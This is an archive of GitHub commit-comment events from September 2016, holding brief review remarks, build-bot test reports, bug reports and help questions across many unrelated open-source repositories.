{"id":"4558634314","type":"CommitCommentEvent","actor":{"login":"Mafii"},"repo":{"name":"IDPA-2016-NEAT-CNN/NEAT_Visualizer"},"payload":{"comment":{"id":19009827,"position":null,"line":null,"path":null,"commit_id":"1356deb8e12aa7029038de859f0bfc3648fd33b3","created_at":"2016-09-13T22:15:19Z","updated_at":"2016-09-13T22:15:19Z","body":"they werent. Forgot I already pushed them and tried to fix a gtk problem."}},"created_at":"2016-09-13T22:15:19Z"}
{"id":"4558637368","type":"CommitCommentEvent","actor":{"login":"behdad"},"repo":{"name":"behdad/harfbuzz"},"payload":{"comment":{"id":19009832,"position":16,"line":624,"path":"src/hb-ft.cc","commit_id":"62bb58d272e6027e003a88f8e0a7276bd9502d0f","created_at":"2016-09-13T22:15:59Z","updated_at":"2016-09-13T22:15:59Z","body":"Should be fixed.  Thanks"}},"created_at":"2016-09-13T22:15:59Z"}
{"id":"4558639783","type":"CommitCommentEvent","actor":{"login":"stephengroat"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19009837,"position":null,"line":null,"path":null,"commit_id":"70e5f0414c2770442b4be61f6ed1d6557541fdb7","created_at":"2016-09-13T22:16:29Z","updated_at":"2016-09-13T22:16:29Z","body":"I have verified that the Symantec VIP app works with eBay. I will update the doc with the correct link"}},"created_at":"2016-09-13T22:16:29Z"}
{"id":"4558643025","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19009845,"position":null,"line":null,"path":null,"commit_id":"e8bf31d89d5105d50ea27f73b27ba98348a19a2f","created_at":"2016-09-13T22:17:12Z","updated_at":"2016-09-13T22:17:12Z","body":"Please, add in the README file the default password. Thanks dude!"}},"created_at":"2016-09-13T22:17:12Z"}
{"id":"4558644973","type":"CommitCommentEvent","actor":{"login":"karolherbst"},"repo":{"name":"karolherbst/mesa"},"payload":{"comment":{"id":19009851,"position":null,"line":null,"path":null,"commit_id":"6b5c0be3bbaac457129b7796f3ba359a1f728a5d","created_at":"2016-09-13T22:17:37Z","updated_at":"2016-09-13T22:17:37Z","body":"move to constant folding"}},"created_at":"2016-09-13T22:17:37Z"}
{"id":"4558646476","type":"CommitCommentEvent","actor":{"login":"russleyshaw"},"repo":{"name":"russleyshaw/Colisee"},"payload":{"comment":{"id":19009854,"position":23,"line":13,"path":"src/head_server/bracket/bracket.html","commit_id":"86dfcad8b55ef7d8523d8fc6ceee22b7457932a3","created_at":"2016-09-13T22:17:56Z","updated_at":"2016-09-13T22:17:56Z","body":"Eventually this should be changed to be handlebars syntax built by the handlebars \"compiler\"\r\n\r\nSee the mock web server as an example.\r\n\r\n"}},"created_at":"2016-09-13T22:17:56Z"}
{"id":"4558647234","type":"CommitCommentEvent","actor":{"login":"quintesse"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19009864,"position":null,"line":null,"path":null,"commit_id":"0845109c96717486e4e96edda5af6e2684f3b5e1","created_at":"2016-09-13T22:18:08Z","updated_at":"2016-09-13T22:18:08Z","body":"@FroMage this seems to cause a bunch of errors in the SDK:\r\n\r\n```\r\n[ceylon-test] test.ceylon.transaction::localTxnTest - error (java.lang.LinkageError: loader constraint violation: loader (instance of ceylon/modules/jboss/runtime/CeylonModuleClassLoader) previously initiated loading for a different type with name \"javax/transaction/xa/XAResource\")\r\n[ceylon-test] test.ceylon.transaction::sqlTest1 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::sqlTest2a - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::sqlTest2b - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::sqlTest3 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest1 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest2 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest3 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest4 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest5 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest6 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest7 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n[ceylon-test] test.ceylon.transaction::txnTest8 - error (java.lang.NoClassDefFoundError: Could not initialize class com.arjuna.ats.internal.jta.transaction.arjunacore.TransactionImple)\r\n```\r\n"}},"created_at":"2016-09-13T22:18:08Z"}
{"id":"4558653828","type":"CommitCommentEvent","actor":{"login":"jtreuting"},"repo":{"name":"hbgwhite/IM_OpenDJ"},"payload":{"comment":{"id":19009879,"position":33,"line":105,"path":"sbacInstaller/artifacts/scripts/sbacProcessXML.pl","commit_id":"895f465ba505736de7675b908128642c0d9a9586","created_at":"2016-09-13T22:19:37Z","updated_at":"2016-09-13T22:19:37Z","body":"Did you mean to switch the defaults here or was that for debugging and they should be switched back for the code checked in?"}},"created_at":"2016-09-13T22:19:37Z"}
{"id":"4558653854","type":"CommitCommentEvent","actor":{"login":"jtotoole"},"repo":{"name":"Parsely/wp-parsely"},"payload":{"comment":{"id":19009880,"position":58,"line":504,"path":"wp-parsely.php","commit_id":"de0e21b3c32e453be63dda564439018158eaec6c","created_at":"2016-09-13T22:19:37Z","updated_at":"2016-09-13T22:19:37Z","body":"Any reason to return an empty string here rather than just `return;`?"}},"created_at":"2016-09-13T22:19:37Z"}
{"id":"4558653963","type":"CommitCommentEvent","actor":{"login":"PureWeen"},"repo":{"name":"domaven/xamarin-plugins"},"payload":{"comment":{"id":19009881,"position":null,"line":null,"path":null,"commit_id":"74ec1dc4e3413869e315ab0188772323ed9f5c18","created_at":"2016-09-13T22:19:38Z","updated_at":"2016-09-13T22:19:38Z","body":"I think this commit makes this plugin incompatible with Xamarin Forms version requirements as Xamarin Forms can only upgrade the GooglePlayServices up to version 29.,0.0.1\r\n\r\nNot sure if that matters to you :-) but figured I'd mention it in case I'm wrong....\r\n\r\n"}},"created_at":"2016-09-13T22:19:38Z"}
{"id":"4558654008","type":"CommitCommentEvent","actor":{"login":"SpeedyDanny"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19009882,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T22:19:39Z","updated_at":"2016-09-13T22:19:39Z","body":"im not talking about nfsw files...where are the files of the server that must be \"fixed\" to run game on lan? \r\nim not even sure how to ask\r\nWhat files are you making for the server?(witch one) location and name.\r\nin what format are the files that are you making for the server....?\r\nwitch what program are you open/edit them?\r\nMy questions has no sense because i dont know how exactly are you making these files."}},"created_at":"2016-09-13T22:19:39Z"}
{"id":"4558660927","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19009897,"position":null,"line":null,"path":null,"commit_id":"cc2bb9426af1576d54fe9e2612819c3102c0eaa8","created_at":"2016-09-13T22:21:13Z","updated_at":"2016-09-13T22:21:13Z","body":"See discussion there: mcostalba@ace8e95...ad7d2bd"}},"created_at":"2016-09-13T22:21:13Z"}
{"id":"4558665294","type":"CommitCommentEvent","actor":{"login":"arman666a"},"repo":{"name":"arman666a/bespar"},"payload":{"comment":{"id":19009911,"position":58,"line":58,"path":"resources/views/auth/login.blade.php","commit_id":"2618d95f73261716273c371535a201f7d77ce28d","created_at":"2016-09-13T22:22:06Z","updated_at":"2016-09-13T22:22:06Z","body":"fa shode"}},"created_at":"2016-09-13T22:22:06Z"}
{"id":"4558666477","type":"CommitCommentEvent","actor":{"login":"Synapz1"},"repo":{"name":"Synapz1/Paintball"},"payload":{"comment":{"id":19009912,"position":null,"line":null,"path":null,"commit_id":"fa890931514637cd7bd0009660d50d2cecacafe5","created_at":"2016-09-13T22:22:22Z","updated_at":"2016-09-13T22:22:22Z","body":"I can't get this working. I tried Maven Projects > Compile and it put out a lot of errors (error: cannot find symbol [ERROR] class ArenaManager, and many more like this). I wasted an hour doing this with no results and I am just disabling MySQL since I can't get it to work."}},"created_at":"2016-09-13T22:22:22Z"}
{"id":"4558674063","type":"CommitCommentEvent","actor":{"login":"markparise"},"repo":{"name":"markparise/SeniorDesignFall16"},"payload":{"comment":{"id":19009933,"position":null,"line":null,"path":null,"commit_id":"b163408a22b985cd4ddf27c8550b5dfd561b62bd","created_at":"2016-09-13T22:24:04Z","updated_at":"2016-09-13T22:24:04Z","body":"written in python, so it will download as a .py file"}},"created_at":"2016-09-13T22:24:04Z"}
{"id":"4558674723","type":"CommitCommentEvent","actor":{"login":"jtreuting"},"repo":{"name":"hbgwhite/IM_OpenDJ"},"payload":{"comment":{"id":19009938,"position":103,"line":1575,"path":"sbacInstaller/artifacts/scripts/sbacProcessXML.pl","commit_id":"895f465ba505736de7675b908128642c0d9a9586","created_at":"2016-09-13T22:24:13Z","updated_at":"2016-09-13T22:24:13Z","body":"Do we know if this will work when they aren't using SSL (specifically TLS) or the username/password is blank because credentials aren't needed?  \r\n\r\nMaybe the SSL flag should be a variable as well, and can you see in the documentation what happens if empty strings are password for username and password.  Is that how you send without authentication with this library?  If not we will need an if statement to call 2 different versions if credentials are not supplied?"}},"created_at":"2016-09-13T22:24:13Z"}
{"id":"4558678031","type":"CommitCommentEvent","actor":{"login":"jrbenito"},"repo":{"name":"2factorauth/twofactorauth"},"payload":{"comment":{"id":19009946,"position":null,"line":null,"path":null,"commit_id":"70e5f0414c2770442b4be61f6ed1d6557541fdb7","created_at":"2016-09-13T22:25:00Z","updated_at":"2016-09-13T22:25:00Z","body":"Sure, I am looking at https://twofactorauth.org/ and docs are not pointing to same URL."}},"created_at":"2016-09-13T22:25:00Z"}
{"id":"4558681119","type":"CommitCommentEvent","actor":{"login":"sojanpr"},"repo":{"name":"BranchMetrics/ios-branch-deep-linking"},"payload":{"comment":{"id":19009956,"position":4,"line":52,"path":"Branch-SDK/Branch-SDK/Requests/BranchLoadRewardsRequest.m","commit_id":"bf0ad2bf318605d93067127ec2cf58e6aaf4a2d4","created_at":"2016-09-13T22:25:36Z","updated_at":"2016-09-13T22:25:36Z","body":"Is there a possibility for meeting this condition? Can we expect nil as key in a  dict?"}},"created_at":"2016-09-13T22:25:36Z"}
{"id":"4558697611","type":"CommitCommentEvent","actor":{"login":"peonso"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19010004,"position":5,"line":45,"path":"MySql_Schema.sql","commit_id":"e8bf31d89d5105d50ea27f73b27ba98348a19a2f","created_at":"2016-09-13T22:29:28Z","updated_at":"2016-09-13T22:29:28Z","body":"41da8bef22aaef9d7c5821fa0f0de7cccc4dda4d = tibia"}},"created_at":"2016-09-13T22:29:28Z"}
{"id":"4558700183","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010007,"position":null,"line":null,"path":null,"commit_id":"d1330a0bfe6e42c227c3115b40299a6035bf4190","created_at":"2016-09-13T22:30:03Z","updated_at":"2016-09-13T22:30:03Z","body":"versionNumbers (mitchute) - x86_64-MacOS-10.9-clang: OK (2327 of 2328 tests passed, 20 test warnings)\n\n * 20 tests had: EIO diffs.\n * 20 tests had: ERR diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-d1330a0bfe6e42c227c3115b40299a6035bf4190-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T22:30:03Z"}
{"id":"4558718140","type":"CommitCommentEvent","actor":{"login":"aaustin"},"repo":{"name":"BranchMetrics/ios-branch-deep-linking"},"payload":{"comment":{"id":19010071,"position":4,"line":52,"path":"Branch-SDK/Branch-SDK/Requests/BranchLoadRewardsRequest.m","commit_id":"bf0ad2bf318605d93067127ec2cf58e6aaf4a2d4","created_at":"2016-09-13T22:33:59Z","updated_at":"2016-09-13T22:33:59Z","body":"no - I changed it in the actual PR"}},"created_at":"2016-09-13T22:33:59Z"}
{"id":"4558722834","type":"CommitCommentEvent","actor":{"login":"nilzao"},"repo":{"name":"nilzao/soapbox-race-udp"},"payload":{"comment":{"id":19010088,"position":null,"line":null,"path":null,"commit_id":"2c3b4d18a22876e6ee1b12108ec045ebf83e0a1d","created_at":"2016-09-13T22:35:04Z","updated_at":"2016-09-13T22:35:04Z","body":"there are no \"server files\" here, there is \"java source-code to build a server\" here.\r\n\r\nthis is programming, not modding, you can open/edit this files with notepad and compile with javac, I suggest work with a java IDE.\r\n\r\nfirst things first, try to find the answer to these questions:\r\n- what is source code?\r\n- what is java source code?\r\n- what is maven?\r\n- how to build java maven projects?\r\n- what is an IDE?\r\n- what is git?\r\n- what is a git commit?\r\n- what is github?\r\n- what is a github repository?\r\n"}},"created_at":"2016-09-13T22:35:04Z"}
{"id":"4558725106","type":"CommitCommentEvent","actor":{"login":"nelhage"},"repo":{"name":"rcoder/kafka-pixy"},"payload":{"comment":{"id":19010094,"position":20,"line":45,"path":"main.go","commit_id":"3b370c652fb282eded68cb5931b7920f4611b6ed","created_at":"2016-09-13T22:35:33Z","updated_at":"2016-09-13T22:35:33Z","body":"I'd consider using [`flag.DurationVar`](https://godoc.org/flag#DurationVar) here."}},"created_at":"2016-09-13T22:35:33Z"}
{"id":"4558726969","type":"CommitCommentEvent","actor":{"login":"hilquiasrodrigues"},"repo":{"name":"mojotech/jeet"},"payload":{"comment":{"id":19010099,"position":62,"line":11,"path":"stylus/jeet/aliases.styl","commit_id":"606e04ff8cecdc1fd2318ab48eb82ba76e1d39d4","created_at":"2016-09-13T22:35:59Z","updated_at":"2016-09-13T22:35:59Z","body":"wtf ?"}},"created_at":"2016-09-13T22:35:59Z"}
{"id":"4558727170","type":"CommitCommentEvent","actor":{"login":"frap129"},"repo":{"name":"SAOSP-N/platform_packages_apps_Settings"},"payload":{"comment":{"id":19010100,"position":null,"line":null,"path":null,"commit_id":"60327f387b77aa1661da7ff140bfb9647def6545","created_at":"2016-09-13T22:36:02Z","updated_at":"2016-09-13T22:36:02Z","body":"Just a little tip, you don't need this commit in N, look at https://github.com/SAOSP-N/platform_packages_apps_Settings/commit/60327f387b77aa1661da7ff140bfb9647def6545#diff-c7a48db9fc9bd84be88678b0b246b1b0R127"}},"created_at":"2016-09-13T22:36:02Z"}
{"id":"4558733419","type":"CommitCommentEvent","actor":{"login":"christf"},"repo":{"name":"skorpy2009/supernode_puppet"},"payload":{"comment":{"id":19010111,"position":null,"line":null,"path":null,"commit_id":"1fce5b4f7e70f5df3be9384862821202b09bc887","created_at":"2016-09-13T22:37:22Z","updated_at":"2016-09-13T22:37:22Z","body":"hier sollte die ipv6-ip vom fastd server als dns eingetragen weriden\r\n"}},"created_at":"2016-09-13T22:37:22Z"}
{"id":"4558734024","type":"CommitCommentEvent","actor":{"login":"mrkite"},"repo":{"name":"mrkite/TerraFirma"},"payload":{"comment":{"id":19010112,"position":null,"line":null,"path":null,"commit_id":"e067f580d933701d866c0db7bcdeb7d8eb6a8ad6","created_at":"2016-09-13T22:37:31Z","updated_at":"2016-09-13T22:37:31Z","body":"thank god."}},"created_at":"2016-09-13T22:37:31Z"}
{"id":"4558744323","type":"CommitCommentEvent","actor":{"login":"Hector1enmanuelles"},"repo":{"name":"Hector1enmanuelles/Proyecto-Java-Ventana-Candidatos"},"payload":{"comment":{"id":19010134,"position":null,"line":null,"path":null,"commit_id":"ba0b40335bdc8c089404bbcd57515704773299fd","created_at":"2016-09-13T22:40:00Z","updated_at":"2016-09-13T22:40:00Z","body":"Creación de la ventana de Candidatos para las entrevistas en construción."}},"created_at":"2016-09-13T22:40:00Z"}
{"id":"4558754698","type":"CommitCommentEvent","actor":{"login":"quinck12"},"repo":{"name":"sudatta0993/STAT_215_Project_1"},"payload":{"comment":{"id":19010162,"position":6,"line":36,"path":".idea/workspace.xml","commit_id":"cc790dfac387e020893e378766d52357105fefc5","created_at":"2016-09-13T22:42:23Z","updated_at":"2016-09-13T22:42:23Z","body":"test comment"}},"created_at":"2016-09-13T22:42:23Z"}
{"id":"4558755813","type":"CommitCommentEvent","actor":{"login":"calaway"},"repo":{"name":"bfpepper/little-shop"},"payload":{"comment":{"id":19010165,"position":null,"line":null,"path":null,"commit_id":"614d49f22a28d99789d026da2be9324f61c3cc6f","created_at":"2016-09-13T22:42:37Z","updated_at":"2016-09-13T22:42:37Z","body":"We've decided to abandon this branch, since we're changing the basic functionality of what we sell on our retail site. We're going to keep this branch around so we can reference the code written in it.\r\n\r\n@bfpepper, @brendandillon, & @NateAnderson1780, please take a look when to get a chance and comment if you agree or if there are any problems with this.\r\n\r\n@s-espinosa: Thank you for your expert guidance. It's valuable to take a step back and look at these things in a different light.  ;-)"}},"created_at":"2016-09-13T22:42:37Z"}
{"id":"4558758181","type":"CommitCommentEvent","actor":{"login":"jbduncan"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19010168,"position":null,"line":null,"path":null,"commit_id":"112e7eb1358ab4bcbaea7a61e195fba29b7e0d13","created_at":"2016-09-13T22:43:10Z","updated_at":"2016-09-13T22:43:10Z","body":"Looks even cleaner than my original solution. Thumbs up! :+1: "}},"created_at":"2016-09-13T22:43:10Z"}
{"id":"4558761173","type":"CommitCommentEvent","actor":{"login":"LoganWright"},"repo":{"name":"vapor/example"},"payload":{"comment":{"id":19010181,"position":null,"line":null,"path":null,"commit_id":"dea4e3d633be67a1698e6132465238961c6e60ee","created_at":"2016-09-13T22:43:50Z","updated_at":"2016-09-13T22:43:50Z","body":"@tannernelson @adriencanterot If you go with default, it fetches the object from database. There's no database in `example` so it only threw errors. I overrode a custom basic implementation so that Controllers could be properly demonstrated."}},"created_at":"2016-09-13T22:43:50Z"}
{"id":"4558763825","type":"CommitCommentEvent","actor":{"login":"Therzok"},"repo":{"name":"mono/xwt"},"payload":{"comment":{"id":19010189,"position":206,"line":206,"path":"Xwt.Gtk.Windows/GtkWin32Interop.cs","commit_id":"2c2b5ae741c6dab6f642a34b2597bd64cf2bdb6b","created_at":"2016-09-13T22:44:27Z","updated_at":"2016-09-13T22:44:27Z","body":"Remove these handlers on window disposal so we don't have circular refs."}},"created_at":"2016-09-13T22:44:27Z"}
{"id":"4558766730","type":"CommitCommentEvent","actor":{"login":"LnL7"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19010212,"position":null,"line":null,"path":null,"commit_id":"28a0da5edc23b8af5396f1725a05965a81ab3513","created_at":"2016-09-13T22:45:07Z","updated_at":"2016-09-13T22:45:07Z","body":"@copumpkin I assume this sha was incorrect."}},"created_at":"2016-09-13T22:45:07Z"}
{"id":"4558770686","type":"CommitCommentEvent","actor":{"login":"dahui58"},"repo":{"name":"dahui58/SSRPG"},"payload":{"comment":{"id":19010249,"position":null,"line":null,"path":null,"commit_id":"2e9a075bb7467625289273adf9ddbc03698217a1","created_at":"2016-09-13T22:46:01Z","updated_at":"2016-09-13T22:46:01Z","body":"**Should remove location from the ship constructor, and add a requirement to separately set the location of a ship before being able to scan**"}},"created_at":"2016-09-13T22:46:01Z"}
{"id":"4558779552","type":"CommitCommentEvent","actor":{"login":"naishta"},"repo":{"name":"naishta/Autolayout"},"payload":{"comment":{"id":19010301,"position":null,"line":null,"path":null,"commit_id":"fcee4468bfaea103fa788001fd470563a0a4dc69","created_at":"2016-09-13T22:48:11Z","updated_at":"2016-09-13T22:48:11Z","body":"Time Label [\"23:15\"]\r\n- pinned to 20 points from top of its SuperView\r\n\r\nHi Michael, \r\nAdded the constraints as below.\r\n\r\nTime Label [\"23:15\"]\r\n- pinned to 20 points from top of its SuperView\r\n\r\nDay Label [\"Tuesday 13 September\"]\r\n- pinned to 20 points from the Time label\r\n\r\nPress Home Label\r\n- pinned to 20 points from bottom of the Page Indicator\r\n\r\nPage Control Indicator\r\n- pinned to 20 points from bottom of its SuperView\r\n\r\nAll objects\r\n- Aligned Horizontally in Container (=0)"}},"created_at":"2016-09-13T22:48:11Z"}
{"id":"4558781223","type":"CommitCommentEvent","actor":{"login":"marcioAlmada"},"repo":{"name":"marcioAlmada/yay"},"payload":{"comment":{"id":19010304,"position":null,"line":null,"path":null,"commit_id":"06d22c0b05db271888e4eec3d3ed8b6b126ef13e","created_at":"2016-09-13T22:48:33Z","updated_at":"2016-09-13T22:48:33Z","body":"@SerafimArts please refer to this test ^ with a few improvements on your macro."}},"created_at":"2016-09-13T22:48:33Z"}
{"id":"4558781273","type":"CommitCommentEvent","actor":{"login":"cyanfish"},"repo":{"name":"cyanfish/heltour"},"payload":{"comment":{"id":19010306,"position":6,"line":748,"path":"heltour/tournament/admin.py","commit_id":"956595eb61c04a5139dc5652157b91af48d72305","created_at":"2016-09-13T22:48:34Z","updated_at":"2016-09-13T22:48:34Z","body":"Unless there's an immediate use case, I think it'd be easier to leave it as a league FK for now. We can always reconstruct the history based on the reversion data."}},"created_at":"2016-09-13T22:48:34Z"}
{"id":"4558782514","type":"CommitCommentEvent","actor":{"login":"naishta"},"repo":{"name":"naishta/Autolayout"},"payload":{"comment":{"id":19010310,"position":null,"line":null,"path":null,"commit_id":"fcee4468bfaea103fa788001fd470563a0a4dc69","created_at":"2016-09-13T22:48:53Z","updated_at":"2016-09-13T22:48:53Z","body":"Details"}},"created_at":"2016-09-13T22:48:53Z"}
{"id":"4558784861","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010321,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-13T22:49:28Z","updated_at":"2016-09-13T22:49:28Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8: OK (2366 of 2369 tests passed, 0 test warnings)\n\n * 3 tests had: AUD diffs.\n * 3 tests had: EIO diffs.\n * 3 tests had: ERR diffs.\n * 3 tests had: ESO big diffs.\n * 3 tests had: MTR big diffs.\n * 3 tests had: ZSZ big diffs.\n * 3 tests had: Table big diffs.\n * 1 test had: MTD diffs.\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.87%25-yellow.svg)</a> \n"}},"created_at":"2016-09-13T22:49:28Z"}
{"id":"4558786378","type":"CommitCommentEvent","actor":{"login":"jrtom"},"repo":{"name":"google/guava"},"payload":{"comment":{"id":19010329,"position":null,"line":null,"path":null,"commit_id":"112e7eb1358ab4bcbaea7a61e195fba29b7e0d13","created_at":"2016-09-13T22:49:48Z","updated_at":"2016-09-13T22:49:48Z","body":"@jbduncan, FYI, we've actually been discussing options for this internally, and one thing we may do eventually (for the undirected case) is based on observing that the transitive closure for an undirected graph is just the graph consisting of a set of cliques (complete graphs), one corresponding to each weakly connected component in the original graph.\r\n\r\nGiven that, we could calculate the components and then return a Graph which references those components without explicitly building the edges; this would be both faster (O(m) vs. O(n^2)) and require less space (O(n) vs. O(n^2)).  So at some point we may do that."}},"created_at":"2016-09-13T22:49:48Z"}
{"id":"4558787437","type":"CommitCommentEvent","actor":{"login":"cjoan75"},"repo":{"name":"lgandx/Responder"},"payload":{"comment":{"id":19010335,"position":6,"line":136,"path":"README.md","commit_id":"fb69f14f697d63e5593a4fb49a46acd91ef60b18","created_at":"2016-09-13T22:50:08Z","updated_at":"2016-09-13T22:50:08Z","body":"I'm having an issue since responder is sending the poison requests to .1 rather then the real gateway of .2."}},"created_at":"2016-09-13T22:50:08Z"}
{"id":"4558791704","type":"CommitCommentEvent","actor":{"login":"lakinwecker"},"repo":{"name":"cyanfish/heltour"},"payload":{"comment":{"id":19010345,"position":6,"line":748,"path":"heltour/tournament/admin.py","commit_id":"956595eb61c04a5139dc5652157b91af48d72305","created_at":"2016-09-13T22:51:08Z","updated_at":"2016-09-13T22:51:08Z","body":":+1:\r\n"}},"created_at":"2016-09-13T22:51:08Z"}
{"id":"4558798781","type":"CommitCommentEvent","actor":{"login":"mgravell"},"repo":{"name":"davidfowl/Channels"},"payload":{"comment":{"id":19010359,"position":28,"line":180,"path":"samples/Channels.Samples/HttpServer/HttpConnection.cs","commit_id":"6671b1ee9f9af7b1d38a9388f925d6e98b275755","created_at":"2016-09-13T22:52:47Z","updated_at":"2016-09-13T22:52:47Z","body":"still needs `TrimStart`, I think"}},"created_at":"2016-09-13T22:52:47Z"}
{"id":"4558803895","type":"CommitCommentEvent","actor":{"login":"mrose17"},"repo":{"name":"brave/browser-laptop"},"payload":{"comment":{"id":19010377,"position":null,"line":null,"path":null,"commit_id":"e4667bb51f23081796ea445946ea095585e0a5bf","created_at":"2016-09-13T22:54:02Z","updated_at":"2016-09-13T22:54:02Z","body":"functionally, this looks fine.\r\n\r\nstylistically, i'm from the \"dense\" school, so i'd kind of prefer something like\r\n\r\n        data[i].publisherURL = (results[i].protocol || 'http:') + '//' + results[i].publisher\r\n\r\nbut i defer that to you."}},"created_at":"2016-09-13T22:54:02Z"}
{"id":"4558804153","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19010378,"position":null,"line":null,"path":null,"commit_id":"69c685c242f9be19d8e1f66481a2c106ab588ea6","created_at":"2016-09-13T22:54:06Z","updated_at":"2016-09-13T22:54:06Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-69c685c242f9be19d8e1f66481a2c106ab588ea6-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T22:54:06Z"}
{"id":"4558811028","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19010385,"position":null,"line":null,"path":null,"commit_id":"408311f373bd453e3dd874a482cee7c00c45f855","created_at":"2016-09-13T22:55:49Z","updated_at":"2016-09-13T22:55:49Z","body":"This was completely undone in c99344a1f9d9bbc203005322ff9f72f5d079c116"}},"created_at":"2016-09-13T22:55:49Z"}
{"id":"4558811914","type":"CommitCommentEvent","actor":{"login":"sypherce"},"repo":{"name":"sypherce/ds2key"},"payload":{"comment":{"id":19010387,"position":null,"line":null,"path":null,"commit_id":"7bb9f1abfda079da0a1d247e5a6e0b2117108f9b","created_at":"2016-09-13T22:56:03Z","updated_at":"2016-09-13T22:56:03Z","body":"This was completely undone in c99344a1f9d9bbc203005322ff9f72f5d079c116"}},"created_at":"2016-09-13T22:56:03Z"}
{"id":"4558812666","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19010391,"position":69,"line":69,"path":"lesson_4/train.rb","commit_id":"402fc82f907f3d044deaec0f38e551a0bf76bd08","created_at":"2016-09-13T22:56:14Z","updated_at":"2016-09-13T22:56:14Z","body":"Вопрос 1."}},"created_at":"2016-09-13T22:56:14Z"}
{"id":"4558818500","type":"CommitCommentEvent","actor":{"login":"fee1good"},"repo":{"name":"fee1good/thinknetica_ror_beginer"},"payload":{"comment":{"id":19010407,"position":18,"line":18,"path":"lesson_4/main.rb","commit_id":"402fc82f907f3d044deaec0f38e551a0bf76bd08","created_at":"2016-09-13T22:57:42Z","updated_at":"2016-09-13T22:57:42Z","body":"Программа отрабатывает так:\r\n```\r\nvictor@victor-ubuntu:~/ROR/thinknetica_ror_beginer/lesson_4$ irb -r ./main.rb\r\nВагоны у поезда #<Train:0x005613f0228850>\r\n#<Wagon:0x005613f02285d0>\r\n#<Wagon:0x005613f0228530>\r\n```\r\nКак мне сделать отображение более читабельным? Пытался переделывать `to_s`, не вышло как-то.\r\n"}},"created_at":"2016-09-13T22:57:42Z"}
